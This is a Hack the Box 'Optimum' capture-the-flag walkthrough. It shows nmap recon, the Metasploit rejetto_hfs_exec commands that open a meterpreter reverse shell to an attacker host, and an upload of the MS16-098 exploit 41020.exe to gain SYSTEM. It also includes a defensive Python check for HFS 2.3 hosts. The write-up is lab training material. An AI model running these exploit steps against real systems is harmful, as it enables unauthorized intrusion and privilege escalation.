Hello friends!! Today we are going to solve another CTF challenge called “Optimum”, which is categorised as a retired lab developed by Hack the Box for the purpose of online penetration testing practice. Solving this lab is not that tough if you have proper knowledge of penetration testing. Let’s start and learn how to breach it.
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are online, they have static IPs. The IP of Optimum is 10.10.10.8, so let’s start with nmap port enumeration.
nmap -A 10.10.10.8
From the image given below, you can observe that port 80 is open for file sharing using HFS 2.3 in the victim’s network.
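The same finding can be turned into an inventory check for your own network. The following is an added example, not part of the original write-up: it parses nmap XML output (`-sV -oX`) and lists open ports running HFS 2.3. The sample XML is constructed, and the product string `HttpFileServer httpd` and the 192.0.2.20 host are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX` output (not the original scan data).
SAMPLE_XML = """<nmaprun>
  <host><address addr="10.10.10.8" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="80"><state state="open"/>
      <service name="http" product="HttpFileServer httpd" version="2.3"/></port>
  </ports></host>
  <host><address addr="192.0.2.20" addrtype="ipv4"/><ports>
    <port protocol="tcp" portid="80"><state state="open"/>
      <service name="http" product="nginx" version="1.24.0"/></port>
    <port protocol="tcp" portid="8080"><state state="closed"/>
      <service name="http" product="HttpFileServer httpd" version="2.3"/></port>
  </ports></host>
</nmaprun>"""

# Assumption: nmap's product string for the service contains one of these markers.
HFS_MARKERS = ("httpfileserver", "hfs")
# The version the write-up found on port 80; prefix match also catches 2.3x builds.
FLAGGED_VERSION_PREFIX = "2.3"


def find_hfs_hosts(nmap_xml):
    """Return (address, port, product, version) for each open port running HFS 2.3."""
    findings = []
    for host in ET.fromstring(nmap_xml).iter("host"):
        addr_el = host.find("address")
        addr = addr_el.get("addr") if addr_el is not None else "unknown"
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            if state is None or svc is None or state.get("state") != "open":
                continue  # closed or filtered ports are not reachable services
            product, version = svc.get("product", ""), svc.get("version", "")
            is_hfs = any(marker in product.lower() for marker in HFS_MARKERS)
            if is_hfs and version.startswith(FLAGGED_VERSION_PREFIX):
                findings.append((addr, int(port.get("portid")), product, version))
    return findings


if __name__ == "__main__":
    for addr, port, product, version in find_hfs_hosts(SAMPLE_XML):
        print(f"{addr}:{port} runs {product} {version}: upgrade or remove")
```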
When I Googled for a related exploit, the first link I found was for a Metasploit exploit.
Then run the msfconsole command in a terminal to load the Metasploit framework and use the said exploit; for that, type the following commands:
msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/http/rejetto_hfs_exec) > set rhost 10.10.10.8
msf exploit(windows/http/rejetto_hfs_exec) > set lhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) > set srvhost 10.10.14.6
msf exploit(windows/http/rejetto_hfs_exec) > exploit
When it works, you will get meterpreter session 1 as shown below, and running the sysinfo command will show you the victim’s system information.
Now let’s complete this task by searching for the user.txt and root.txt flags, which are hidden somewhere inside its directories.
Inside c:\Documents and Settings\kostas\Desktop I found the user.txt file and used the cat command to read this file.
Great!! We got our 1st flag successfully.
To get the root flag I really struggled a lot; all the privilege escalation exploits suggested by recon/local_exploit_suggester did not work when I tried them. Then I took help from Google and searched for exploits related to Windows Server and found many; “MS16-098 exploit 41020” was among them. I simply downloaded this exe file and applied manual privilege escalation.
After downloading the exe file from Google, I transferred it to the target’s machine via the meterpreter session, with the help of the following commands:
meterpreter > upload /root/Desktop/41020.exe .
Then, after executing the whoami command, it assured me “nt authority\system”.
Inside c:\Documents and Settings\Administrator\Desktop I found the root.txt file and used the type command to read the file.
Great!! We got our 2nd flag successfully.
And this way, we successfully solved our challenge. YAY!
Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.